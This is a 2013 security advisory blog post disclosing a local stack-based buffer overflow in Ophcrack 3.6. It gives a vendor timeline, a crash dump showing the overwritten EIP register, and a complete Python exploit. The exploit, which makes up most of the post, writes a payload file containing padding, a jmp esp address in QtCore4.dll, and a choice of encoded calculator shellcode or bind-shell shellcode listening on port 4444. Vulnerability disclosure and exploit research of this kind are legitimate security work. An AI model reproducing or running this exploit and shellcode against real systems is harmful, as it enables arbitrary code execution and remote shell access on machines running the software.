Ophcrack Local Stack Based Buffer Overflow

1. Advisory Information

Title: Ophcrack 3.6 Local Stack Based Buffer Overflow
Advisory URL: https://osandamalith.wordpress.com/2013/12/28/ophcrack-local-stack-based-buffer-overflow
Date published: 2013-12-29
Vendors contacted: OBJECTIF SÉCURITÉ
Release mode: User release

2. Vulnerability Information

Class: Buffer Overflow [CWE-119]
Impact: Code Execution
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: N/A

3. Summary

Opcrack is a password cracker based on rainbow tables, a method that makes it possible to speed up the cracking process by using the result of calculations done in advance and stored rainbow tables.

4. Vulnerability Description

Ophcrack contains an overflow condition that is triggered as user-supplied input is not properly validated when passed via the ‘Host name:’, ‘Share:’, ‘User:’ fields. This may allow a local attacker to cause a stack-based buffer overflow, resulting in a denial of service or potentially allowing the execution of arbitrary code. Failure to exploit this vulnerability may cause denial of service.

5. Vulnerable Packages

  • 3.6
  • Older Versions might be vulnerable as well, they were not tested

6. Credits

This bug was researched and proof of concept exploit by Osanda Malith Jayathissa.

7. Proof of Concept / Technical Details

The EIP register is overwritten by our supplied arbitrary buffer.

(1bbc.17c8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=ffffffff ebx=41414141 ecx=75d83d66 edx=00330dc0 esi=41414141 edi=41414141
eip=41414141 esp=002895a0 ebp=41414141 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210202
41414141 ??              ???

poc

Proof of concept exploit code.

#!/usr/bin/python
# Title: Ophcrack 3.6 Local Stack Based Buffer Overflow
# Version: 3.6
# Tested on: Windows XP SP2 en, Windows 8 64-bit
# Vendor: http://ophcrack.sourceforge.net/
# Software Link: http://sourceforge.net/projects/ophcrack/files/ophcrack/3.6.0/ophcrack-win32-installer-3.6.0.exe
# Original Advisory: https://osandamalith.wordpress.com/2013/12/29/ophcrack-local-stack-based-buffer-overflow/
# E-Mail: osandajayathissa@gmail.com
# Exploit-Author: Osanda Malith 
# Twitter: @OsandaMalith
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
# Video: https://www.youtube.com/watch?v=YPPIyxPMakI
'''
This exploit is super lame, as no user is going to paste 1000 characters
of text into the textbox, however it could potentially be used for
privilege escalation. It was still a fun learning exercise.
'''
'''
To exploit this bug open Ophcrack -> Click Load -> Remote SAM
There are three fields "Host name:", "Share:", "User:"
All three fields are vulnerable. I have made this exploit to work on those 3 fields.
Copy the contents written to the file into the specific field you selected and click ok.
'''
print '''
                                                                              
     _/_/              _/                                                _/   
  _/    _/  _/_/_/    _/_/_/      _/_/_/  _/  _/_/    _/_/_/    _/_/_/  _/  _/
 _/    _/  _/    _/  _/    _/  _/        _/_/      _/    _/  _/        _/_/   
_/    _/  _/    _/  _/    _/  _/        _/        _/    _/  _/        _/  _/  
 _/_/    _/_/_/    _/    _/    _/_/_/  _/          _/_/_/    _/_/_/  _/    _/ 
        _/                                                                    
       _/                                                                     
  
[+] Opchrack 3.6 Local Buffer Overflow Exploit
[+] Author: Osanda Malith Jayathissa < osandajayathissa [at] gmail.com >
[~] Special Thanks to Matt "hostess" Andreko < mandreko [at] accuvant.com >

'''
while True:
	try:
		choice = int(raw_input("[?] In which field do you want to inject our payload?\n1.Host name\n2.Share\n3.User\n"))
	except ValueError:
		print "[!] Enter only a number"
		continue
	# If you select "Host name" you would get a error after injecting. Click "Don't send" and enjoy the payload	
	if choice == 1:
		buff = "A" * 497 
		break
	elif choice == 2:
		buff = "A" * 504
		break
	elif choice == 3:
		buff = "A" * 504
		break	
	else:
		print "[-] Invalid Choice"
		continue
# jmp instruction must be 'ascii' due to character set restrictions
# jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.8.4.0 (C:\Program Files\ophcrack\QtCore4.dll)
eip = "\x39\x5b\x2b\x6e" 

while True:
	try:
		choice = int(raw_input("[?] Choose your payload:\n1.Calculator\n2.Bind Shell\n"))
	except Exception, e:
		print "[!] Enter only a number"
		continue
		
	if choice == 1:
		#ALPHA3.py esp --input="shellcode.bin" 
		shellcode =  "TYhffffk4diFkDql02Dqm0D1CuEE0l3i8o3J378P4P8L4u8L3g0f3A0B1n2K405o7N5K328O4E3T4I0g"
		shellcode += "0c1k0Q4M358P5M4y0I2Z3g3I3E3E2j4C2r110H135l0p0H7o381M0E0s3i4Z3D4p5k2C1l335N4R4L4D"
		shellcode += "3w4X4H1L4p2n3R3M3L3C2x4s8o4H3M8N4y3J4P3j4S1k3b3L0h2r08125o1K0b1o101P0514373A1o0Z"
		shellcode += "3O340Q0O0n5n4F4B8n4X1k0i4u4m0S407o0c1m4m4P5M2y135O1K0V1l4z3D0G3S0h120C4I183B0y14"
		shellcode += "3h4H3G8K3S1L2k3E4r162Z3E7k5O138P5L3H0O0c0T15034I0v3M3P4H3h0Z2H3w3h3C002k7l4L3J1L"
		shellcode += "2F3h0w3q0b8O3u2q064O1p4K3w0P3S0w1N2O2B043K0K7p3r4n1k2z0p017k0F3p4Y0u093d301n0n"	
		break
	elif choice == 2:
		# Thanks to Matt for teaching me about choosing correct shellcode 🙂
		# Modify this part with your own custom shellcode
		# msfpayload windows/shell/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t c BufferRegister=ESP
		shellcode = (
					"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
					"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
					"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
					"\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x69\x78\x4e\x69\x73\x30"
					"\x65\x50\x47\x70\x71\x70\x6f\x79\x39\x75\x74\x71\x78\x52\x31"
					"\x74\x6e\x6b\x70\x52\x50\x30\x4e\x6b\x33\x62\x34\x4c\x4c\x4b"
					"\x66\x32\x64\x54\x4c\x4b\x51\x62\x74\x68\x64\x4f\x4e\x57\x51"
					"\x5a\x45\x76\x45\x61\x59\x6f\x74\x71\x59\x50\x4e\x4c\x37\x4c"
					"\x70\x61\x53\x4c\x56\x62\x76\x4c\x47\x50\x39\x51\x7a\x6f\x56"
					"\x6d\x46\x61\x6a\x67\x78\x62\x7a\x50\x70\x52\x46\x37\x4e\x6b"
					"\x52\x72\x76\x70\x6e\x6b\x37\x32\x65\x6c\x43\x31\x4a\x70\x4c"
					"\x4b\x71\x50\x54\x38\x4c\x45\x59\x50\x62\x54\x50\x4a\x45\x51"
					"\x6e\x30\x32\x70\x6e\x6b\x71\x58\x46\x78\x6c\x4b\x50\x58\x31"
					"\x30\x65\x51\x49\x43\x38\x63\x47\x4c\x32\x69\x4c\x4b\x54\x74"
					"\x6c\x4b\x37\x71\x58\x56\x46\x51\x69\x6f\x56\x51\x39\x50\x4e"
					"\x4c\x5a\x61\x6a\x6f\x76\x6d\x46\x61\x68\x47\x57\x48\x6d\x30"
					"\x31\x65\x6c\x34\x53\x33\x73\x4d\x39\x68\x67\x4b\x31\x6d\x64"
					"\x64\x43\x45\x58\x62\x51\x48\x4c\x4b\x53\x68\x61\x34\x66\x61"
					"\x6a\x73\x35\x36\x6c\x4b\x44\x4c\x42\x6b\x6e\x6b\x71\x48\x67"
					"\x6c\x33\x31\x6b\x63\x6c\x4b\x47\x74\x4e\x6b\x55\x51\x6a\x70"
					"\x4e\x69\x63\x74\x67\x54\x47\x54\x71\x4b\x43\x6b\x45\x31\x76"
					"\x39\x52\x7a\x73\x61\x69\x6f\x6b\x50\x32\x78\x63\x6f\x72\x7a"
					"\x4c\x4b\x36\x72\x58\x6b\x6d\x56\x61\x4d\x62\x48\x65\x63\x50"
					"\x32\x45\x50\x35\x50\x31\x78\x64\x37\x54\x33\x76\x52\x43\x6f"
					"\x63\x64\x50\x68\x50\x4c\x54\x37\x37\x56\x65\x57\x59\x6f\x48"
					"\x55\x6f\x48\x6a\x30\x76\x61\x45\x50\x53\x30\x66\x49\x6f\x34"
					"\x30\x54\x32\x70\x75\x38\x37\x59\x6b\x30\x30\x6b\x57\x70\x49"
					"\x6f\x68\x55\x56\x30\x42\x70\x50\x50\x32\x70\x31\x50\x36\x30"
					"\x73\x70\x50\x50\x35\x38\x68\x6a\x74\x4f\x49\x4f\x69\x70\x39"
					"\x6f\x39\x45\x4c\x49\x6a\x67\x55\x61\x59\x4b\x56\x33\x52\x48"
					"\x74\x42\x47\x70\x56\x71\x33\x6c\x4e\x69\x39\x76\x31\x7a\x64"
					"\x50\x52\x76\x56\x37\x32\x48\x59\x52\x59\x4b\x37\x47\x55\x37"
					"\x79\x6f\x4a\x75\x50\x53\x50\x57\x31\x78\x68\x37\x7a\x49\x54"
					"\x78\x4b\x4f\x59\x6f\x4a\x75\x50\x53\x62\x73\x31\x47\x45\x38"
					"\x50\x74\x4a\x4c\x57\x4b\x68\x61\x59\x6f\x4e\x35\x72\x77\x4e"
					"\x69\x4b\x77\x65\x38\x52\x55\x50\x6e\x50\x4d\x35\x31\x59\x6f"
					"\x5a\x75\x65\x38\x70\x63\x70\x6d\x70\x64\x35\x50\x6f\x79\x79"
					"\x73\x61\x47\x72\x77\x43\x67\x70\x31\x68\x76\x53\x5a\x54\x52"
					"\x33\x69\x32\x76\x59\x72\x69\x6d\x51\x76\x4f\x37\x70\x44\x47"
					"\x54\x45\x6c\x36\x61\x35\x51\x6c\x4d\x43\x74\x75\x74\x62\x30"
					"\x49\x56\x73\x30\x42\x64\x63\x64\x52\x70\x63\x66\x30\x56\x70"
					"\x56\x43\x76\x63\x66\x72\x6e\x52\x76\x63\x66\x50\x53\x53\x66"
					"\x63\x58\x52\x59\x4a\x6c\x65\x6f\x4f\x76\x49\x6f\x48\x55\x6b"
					"\x39\x79\x70\x70\x4e\x72\x76\x30\x46\x79\x6f\x44\x70\x50\x68"
					"\x33\x38\x4e\x67\x45\x4d\x51\x70\x39\x6f\x58\x55\x6f\x4b\x59"
					"\x70\x35\x4d\x37\x5a\x75\x5a\x31\x78\x6f\x56\x7a\x35\x4d\x6d"
					"\x6f\x6d\x79\x6f\x38\x55\x67\x4c\x57\x76\x73\x4c\x65\x5a\x6f"
					"\x70\x49\x6b\x6b\x50\x74\x35\x66\x65\x6d\x6b\x31\x57\x72\x33"
					"\x61\x62\x70\x6f\x32\x4a\x37\x70\x56\x33\x59\x6f\x69\x45\x41"
					"\x41")
		print "[+] Connect on port 4444"
		break
	else:
		print "[-] Invalid Choice"
		continue

junk = "A" * 100
# Glad to write this at 17 😉
# Combine strings
exploit = buff + eip + shellcode + junk
print "[+] Writing to file >> exploit.txt"
# Write it out to file
file = open("exploit.txt", "w")
file.write(exploit)
file.close()
print "[~] " + str(len(exploit)) + " Bytes written to file"  
print "[+] Copy all the contents inside the file into the field you selected and click ok"
#EOF


8. Report Timeline

2013-12-28: The researcher notifies the vendor OBJECTIF SÉCURITÉ.
2013-12-29: Vendor confirms that it is not a big issue as the risk is low in exploiting. But would patch it in the next release and acknowledge.
2013-12-29: Public advisory released

9.  Disclaimer 

The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

10. References

[1] http://packetstormsecurity.com/files/124622

Advertisements

6 thoughts on “Ophcrack Local Stack Based Buffer Overflow

  1. Pingback: Advanced Shellcoding Techniques | Global Computers Talagang

  2. Pingback: Pwning Script Kiddies – Acunetix Buffer Overflow | Blog of Osanda Malith

  3. Pingback: When Program (tool)hacker have Bug What happen? | Komsot | tutorial | Shared | training |

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s